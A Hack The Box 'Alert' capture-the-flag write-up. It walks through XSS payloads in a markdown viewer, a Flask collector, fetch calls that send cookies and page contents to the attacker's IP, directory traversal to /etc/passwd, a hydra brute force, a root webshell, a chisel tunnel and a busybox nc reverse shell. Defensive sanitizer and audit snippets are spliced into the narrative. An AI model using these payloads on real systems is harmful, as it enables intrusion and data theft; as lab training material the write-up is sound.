![[Alert.png]]

## Summary Of Exploitation

Alert was an easy box with a not-so-easy foothold and a couple of rabbit holes that made it really fun. Essentially, an XSS vulnerability leads to sensitive information disclosure from a click-happy admin user. Leveraging the data found, I was able to log in via SSH after a brute force. There I discovered a local webserver running as root where I had write privileges in the webroot, allowing me to pass root commands back to the machine via a webshell.

Alright, let's get started.

As always, the first thing I do is my tried and true Nmap scan. I choose this scan pretty much every time to ensure I get everything all at once, with the exception of UDP:

- `-sC` for common scripts
- `-sV` for version detection
- `-p-` for all ports
- `--min-rate 10000` for speed
- `-oN` to save the normal output to a file

![[Hack The Box/Alert/NmapScan.png]]

There are 2 open ports, pretty standard for a Linux machine.

| Port | Protocol | Service Details              |
| ---- | -------- | ---------------------------- |
| 22   | ssh      | OpenSSH 8.2p1                |
| 80   | http     | Apache httpd 2.4.41 ((Ubuntu)) |

I noticed the redirect and will add it to my /etc/hosts file.

![[etcHostsFile.png]]

I'm going to start with some light recon of the webserver by navigating via web browser to http://alert.htb and, as nmap pointed out, I was redirected to index.php?page=alert. It looks like all the pages are served through the `page` PHP parameter. I'll keep this in mind for later to check for potential Local File Inclusion.

![[initialWebpage.png]]

Just from an initial observation, this is an application that allows a user to view markdown. Markdown is a markup language used to format plain text using symbols.
I'm going to use the application as intended to see how it works. I'll create a simple line of text in mousepad, formatted using markdown; here is a [cheatsheet](https://www.markdownguide.org/cheat-sheet/).

![[markdownTest.png]]

I'll upload it on the homepage and click View Markdown.

![[ViewMarkdown.png]]
![[MarkdownExample.png]]

As you can see, the markdown works. I noticed at the bottom a button to share Markdown. Clicking this shows the same result, but the URL changes to a different PHP script with a parameter called `link_share` that gives your markdown a unique value that can be accessed by another user who clicks the link. Hmmm, I'll keep that in mind.

![[URLweird.png]]

Moving on to the Contact Us page, it looks like there is a way to send a message to the site owners. I'll add this to the list of things that are screaming Cross Site Scripting. Then I'll check out the About Us page.

![[contactUs.png]]

The About Us page has a couple of sentences that pretty much confirm my suspected exploitation vector, this sentence in particular: "Our administrator is in charge of reviewing contact messages..."

![[AboutUs.png]]

Lastly is the Donate page. I didn't see much here, so I donated 40 trillion dollars.

![[Donate.png]]

It didn't do anything.

To wrap up my recon, I'm going to check for any other hidden pages using ffuf to fuzz everything past index.php?page=. To do this, first I'll run:

```bash
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u 'http://alert.htb/index.php?page=FUZZ'
```

Then, once I get a spill of entries, I'll take note of the size and filter it out using the -fs flag.

![[SpillOfEntries.png]]

```bash
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u 'http://alert.htb/index.php?page=FUZZ' -fs 690
```

Running this, I will get the pages that return different content.

![[fuffResults.png]]

I discovered a hidden page: messages.
Navigating to messages returns a blank page, though. This is probably only accessible to an admin and further confirms that I probably need to reach it using XSS.

![[HiddenPage.png]]

While I'm using ffuf, I should also check for hidden subdomains. I can do this by following the same process.

```bash
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H "Host: FUZZ.alert.htb" -u http://alert.htb
```

Wait for the spill.

![[SPillforSubdomains.png]]

Since the size is all over the place, I'm going to filter by lines using -fl 10.

```bash
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H "Host: FUZZ.alert.htb" -u http://alert.htb -fl 10
```

![[FOundSUbdomain.png]]

I found one: statistics! I'll add it to my /etc/hosts file.

![[statsToEtchosts.png]]

Then I'll navigate to it in my browser and see what comes up.

![[SignInforStats.png]]

Looks like this subdomain requires basic authentication to access. I tried passing some default creds such as admin/password and admin/1234, but nothing worked. I'll take note and come back to this.

I want to start poking at the markdown viewer and see if it's vulnerable to Cross Site Scripting. My assumption is that I can leverage the XSS vulnerability to steal a cookie and access admin parts of the webserver, such as messages or the statistics subdomain. Let's give it a try.

First I'll open mousepad (the Kali notepad) and replace the file contents with a markdown XSS payload that I got from [here](https://github.com/JakobTheDev/information-security/blob/master/Payloads/md/XSS.md). I'll grab the first one, which creates a malicious link called XSS.

```markdown
[XSS](javascript:prompt(document.cookie))
```

Then I'll simply upload it to the markdown viewer and hopefully get a prompt showing my cookie when I click the link.

![[GifOfXSS.gif]]

This is a great start. I can clearly run JavaScript to perform XSS. But I don't have a cookie, and I'm not sure if the admin does either.
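The link payload above executes because the viewer turns the markdown into HTML and serves the `javascript:` href untouched. As an added, defender-side example that is not part of this write-up or the box's code, here is an allowlist sanitizer built on Python's standard library that a viewer could run on its rendered HTML: it drops unsafe link schemes, strips script and style bodies, and removes unknown tags and attributes (the tag allowlist is an assumption for the example).

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_TAGS = {"p", "a", "strong", "em", "ul", "ol", "li", "code", "pre", "h1", "h2", "h3", "br", "blockquote"}
ALLOWED_ATTRS = {"a": {"href", "title"}}            # assumption: what a plain viewer needs
SAFE_SCHEMES = {"", "http", "https", "mailto"}      # "" covers relative links like /index.php
VOID_TAGS = {"br"}

def safe_url(value):
    # Browsers ignore whitespace/control characters inside a scheme (a tab in "java<TAB>script:"),
    # so strip them before looking at the scheme; javascript:, data: and vbscript: all fail here.
    cleaned = "".join(ch for ch in value if ch.isprintable() and not ch.isspace())
    return urlparse(cleaned).scheme.lower() in SAFE_SCHEMES

class MarkdownSanitizer(HTMLParser):
    """Re-emits only allowlisted tags/attributes; script/style bodies and unknown tags are dropped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip = 0  # >0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip += 1
        elif not self.skip and tag in ALLOWED_TAGS:
            kept = ""
            for name, value in attrs:
                value = value or ""
                if name in ALLOWED_ATTRS.get(tag, set()) and (name != "href" or safe_url(value)):
                    kept += f' {name}="{escape(value, quote=True)}"'
            self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data))   # all text is HTML-escaped on the way out

def sanitize(rendered_html):
    """Run this on the markdown-to-HTML output before it is stored or served."""
    parser = MarkdownSanitizer()
    parser.feed(rendered_html)
    parser.close()
    return "".join(parser.out)
```

Sanitizing must happen after the markdown is rendered, not before: a markdown-level filter is easy to bypass with raw HTML, which most markdown renderers pass through unchanged.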
I also don't like the idea of the admin having to click multiple links if I send him my share link.

## Exploitation Phase

Let's keep testing. Can I just run script tags? I'll pass the following code to my payload file.

```html
<script>
prompt(document.cookie);
</script>
```

![[JustscriptTage.gif]]

Yes, I can! Easy day; that solves one issue. Next I need to see if the admin has a cookie I can steal. In order to do this, I need to send a link that connects back to my own webserver. I can accomplish this using the Python http.server, but I want to log my requests, so I'm going to build my own. I can do this by creating the following Python script using Flask.

```python
from flask import Flask, request, redirect
from datetime import datetime

app = Flask(__name__)


@app.route('/')
def getCookie():
    # Whatever the payload put in ?data= (a cookie or page contents). Default to ''
    # so a request without the parameter does not crash the handler with a TypeError.
    cookie = request.args.get('data', '')
    # Append-only log with a timestamp; the with block closes the file for us.
    with open("requests.txt", "a") as f:
        f.write(cookie + ' ' + str(datetime.now()) + '\n')
    # Send the visitor back to the site so the callback is not obvious.
    return redirect("http://alert.htb")


if __name__ == "__main__":
    app.run(host='10.10.14.16', port=8080)
```

To explain line by line, the first 2 lines import all the necessary packages I'll need:

- Flask for the webserver framework
- request for the HTTP data handling
- redirect to continue the illusion for the admin
- datetime for timestamps

`app = Flask(...)` creates the application instance to handle the incoming requests.

**`@app.route('/')`**: Maps the root URL (`/`) to the `getCookie` function. When the server receives a request to `/`, this function is executed.

Then we define the function `getCookie()`. We want to capture the result of the request using the query parameter `data`, so we create a variable called `cookie` to store that information. `open` creates (or appends to) a text file named requests.txt, which we can use as a log. `f.write` writes the data in the `cookie` variable to the text file with a timestamp, and the `with` block closes the file when it is done. `return redirect` redirects the user back to the homepage to keep us sneaky. The last bit runs the script on my tun0 interface on port 8080.
Alright, for the rest of my testing I'm going to have this running in one terminal, with requests.txt open as the log at the bottom.

![[ServerAndLog.png]]

Now I'm going to modify my payload to send the cookie to my webserver using fetch rather than showing it in a prompt.

```html
<script>
fetch('http://10.10.14.16:8080/?data=' + encodeURIComponent(document.cookie));
</script>
```

I'll upload it and see what happens.

![[TestOfconnection.gif]]

Great! I managed to connect back to myself! My cookie is still empty, so my log only has a timestamp, and I'm still hoping that maybe the admin has a cookie (spoiler alert: he doesn't). To get the admin to connect, I'll first need to grab my infected URL by clicking the Share Markdown button at the bottom. This will give me the URL I showed previously. Then I'll essentially need to phish. I'll navigate to the Contact Us page and write a message to the admin as [email protected]. (I tried sending a message, but it was being finicky, so just pretend I sent a convincing phishing message.)

![[NoCookie.gif]]

To my disappointment, there was no cookie. I pretty much expected this because I had no cookie myself. However, I can still leverage this vulnerability to check if anything is on the messages page from the admin's perspective by using fetch again. After some trial and error, I settled on this.

```html
<script>
fetch('/index.php?page=messages')
  .then(response => response.text())
  .then(data => {
    fetch('http://10.10.14.16:8080/?data=' + encodeURIComponent(data));
  });
</script>
```

The fetch grabs the content of the messages page, the first `.then` reads the response body as text, and the second `.then` sends the data back to me. Let's update the payload and test it on ourselves by uploading the markdown.

![[TestOfMessagesGather.gif]]

Awesome, it works! You can see in the log that the page is blank, just like when we viewed the page ourselves. Now let's see what the admin sees by sending him the link. This admin needs some serious training.
![[MessagesHadAFile.gif]]

Looking at the log, we can clearly see that messages has a file! Let's get that file. We can do this the same way we got the web page; we just need to fetch the referenced file like this.

```html
<script>
fetch('/messages.php?file=2024-03-10_15-48-34.txt')
  .then(response => response.text())
  .then(data => {
    fetch('http://10.10.14.16:8080/?data=' + encodeURIComponent(data));
  });
</script>
```

I'll go through the same process of uploading and sending the message as before, and then I checked the logs...

![[NotHappyAtAll.png]]

Blank... BLANK! This is when the insanity kicked in. You know, the process of doing the same thing over and over again. It wasn't until later that I realized I should check for directory traversal. Maybe I can access a file outside the webroot. It didn't work for index.php, but maybe it'll work here. I'll update my payload as follows to check.

```html
<script>
fetch('/messages.php?file=../../../../../../../../../../etc/passwd')
  .then(response => response.text())
  .then(data => {
    fetch('http://10.10.14.16:8080/?data=' + encodeURIComponent(data));
  });
</script>
```

![[etcpasswd.gif]]

Fantastic! Not only did I find a directory traversal vulnerability, but I have the users: Albert and David. I'm going to assume that one of these users has access to the previously discovered statistics subdomain. Since statistics is using basic auth, I'm going to run a brute force against it with hydra to see if I can get a password.

```bash
hydra -l albert -P /usr/share/wordlists/rockyou.txt -f statistics.alert.htb http-get
```

I'll start with albert and use rockyou.txt as the password list. `-f` stops after the first valid pair is found, `statistics.alert.htb` is the target, and `http-get` brute-forces basic auth. After a few seconds, I get a hit!

![[AlbertPassword.png]]

Neat. I immediately want to pass this to SSH to see if I have a winner...

![[ShellAsAlbert.png]]

## Priv-Esc to Root

I have a winner. I'll go ahead and grab the user.txt file!

![[Hack The Box/Alert/UserFlag.png]]

Time to look around.
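Before moving on, a defender-side note on the foothold: messages.php handed the `file` parameter straight to a filesystem read, which is why the `../` sequences above reached /etc/passwd. Here is an added example, not the box's code, of the two checks that endpoint was missing, written in Python: a strict filename format matching the message names the app generates, plus a path-containment check after the path is resolved (the messages directory is a constructed temporary stand-in).

```python
import re
import tempfile
from pathlib import Path

# The app names messages like 2024-03-10_15-48-34.txt; anything else is rejected outright.
MESSAGE_NAME = re.compile(r"\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}\.txt")


def is_contained(base_dir, requested):
    """True only if base_dir/requested, after ../ and symlinks are resolved, is a direct
    child of base_dir. This is the check the vulnerable endpoint was missing."""
    base = Path(base_dir).resolve()
    target = (base / requested).resolve()
    return target.parent == base


def read_message(base_dir, requested):
    """Two independent layers: strict filename format first, then path containment.
    Returns the message text, or None for anything that is not a legitimate message."""
    if not MESSAGE_NAME.fullmatch(requested) or not is_contained(base_dir, requested):
        return None
    target = Path(base_dir) / requested
    return target.read_text() if target.is_file() else None


def demo():
    """Constructed stand-in for the messages directory holding one sample message."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "2024-03-10_15-48-34.txt").write_text("constructed message body\n")
        traversal = "../../../../../../../../../../etc/passwd"
        return (
            read_message(d, "2024-03-10_15-48-34.txt"),   # legitimate request
            read_message(d, traversal),                    # rejected by the name check
            is_contained(d, traversal),                    # rejected by containment alone
            is_contained(d, "2024-03-10_15-48-34.txt"),
        )


if __name__ == "__main__":
    print(demo())
```

Either layer alone stops the payload above; keeping both means a future change to the naming scheme does not silently reopen the traversal.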
I'll first check for sudo privileges.

```bash
sudo -l
```

![[NoSudoL.png]]

Albert may not run sudo, oh well. Is albert in any powerful groups?

![[ManagmentGroup.png]]

management looks interesting and is potentially a vector for privilege escalation. Next I usually look at the /opt directory for anything interesting.

![[OptDir.png]]

website-monitor is interesting, but what is more interesting is that the management group can access config. This could be a vector. But first I want to see what is running website-monitor, so I'll run:

```bash
ps -aux
```

![[PsAux.png]]

I see, website-monitor is a local webserver on port 8080 that monitors the external webservers. What's most important is that it is run by root. I found our vector. It's time to HACK...

![[hacker-hacking.gif]]

First I want to see if I can write a file into that config directory. I'll go ahead and drop a super simple PHP webshell.

![[Backdoor.png]]

I can, as expected from the permissions. Now I just need to access it. I'm going to use chisel to proxy this. ^6c10ea

I'll go [here](https://github.com/jpillora/chisel/releases) to grab the latest version of chisel and download it to my Kali.

![[Hack The Box/Alert/wgetChisel.png]]

I will unzip it, rename it, and make it executable.

![[Unzip.png]]

Now I need to transfer it to the victim using Python's http.server.

```bash
python3 -m http.server 8000
```

![[MoveingChisel.gif]]

I'll make it executable.

```bash
chmod +x chisel
```

Now I need to start the server. On the attacker, I'm going to run the following to start the reverse proxy server.

```bash
./chisel server -p 8000 --reverse
```

![[ChiselServer.png]]

Now on the victim I need to run the following to forward the local port back to me.

```bash
./chisel client 10.10.14.16:8000 R:8080:127.0.0.1:8080
```

![[COmmunication.png]]

Now you can see the server is communicating with the client. I can now navigate to http://127.0.0.1:8080 and see the monitor hosted on the victim from the comfort of my attacker machine.
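From the defender's side, the privilege escalation hinges on one misconfiguration: a webroot served by a root process contains a directory that a non-root group can write to. Here is an added example, not from the box or the write-up, of a small Python audit that walks a webroot and reports every entry its group or everyone can write (the directory layout in the demo is constructed to mirror the config directory described above).

```python
import os
import stat
import tempfile
from pathlib import Path


def writable_beyond_owner(webroot):
    """Map relative path -> reason for every entry under webroot that its group or
    everyone can write. For a webroot served by a root-owned process, each hit is a
    place where a member of that group can drop code the server will run as root."""
    root = Path(webroot)
    findings = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            entry = Path(dirpath) / name
            mode = entry.lstat().st_mode
            if stat.S_ISLNK(mode):
                continue  # a symlink's own bits are irrelevant; its target is checked where it lives
            rel = str(entry.relative_to(root))
            if mode & stat.S_IWOTH:
                findings[rel] = "world-writable"
            elif mode & stat.S_IWGRP:
                findings[rel] = "group-writable"
    return findings


def demo():
    """Constructed tree: a config directory the group can write, next to read-only siblings."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "config").mkdir()
        (root / "monitors").mkdir()
        (root / "index.php").touch()
        (root / "config" / "sample.php").touch()
        # mkdir/touch apply the umask, so set the bits explicitly.
        (root / "config").chmod(0o775)
        (root / "monitors").chmod(0o755)
        (root / "index.php").chmod(0o644)
        (root / "config" / "sample.php").chmod(0o664)
        return writable_beyond_owner(root)


if __name__ == "__main__":
    for path, reason in sorted(demo().items()):
        print(f"{reason:15} {path}")
```

On the real host the fix is to make the served tree owned and writable by root only, and to keep anything a lower-privileged group must edit outside the directory the root-run server will execute from.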
![[AccessToMonitor.png]]

I should now be able to access my webshell and run root commands!

![[Hack The Box/Alert/RCE.png]]

That is Remote Code Execution! I can grab the root.txt file.

![[Hack The Box/Alert/RootFlag.png]]

To really own this machine, we need a functional command shell. So I'll pass a one-liner that works fine in the address bar, with my netcat listener on 443.

```bash
busybox nc 10.10.14.16 443 -e /bin/bash
```

![[CMDSHell.gif]]

Nice, now the age-old trick to get me a functional shell. ^e045cb

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
# press Ctrl+Z to background the shell, then on the attacker side:
stty raw -echo && fg
reset            # answer "screen" if asked for the terminal type
export TERM=xterm
clear
```

![[AgeOldTrick.gif]]
![[BOOM.png]]

And there you have it. I thoroughly enjoyed rooting this box. It had a lot of good learning experiences. While not incredibly realistic, it pushes you to think further than just grabbing a cookie. Thank you for taking the time to read this write-up! Happy Hacking!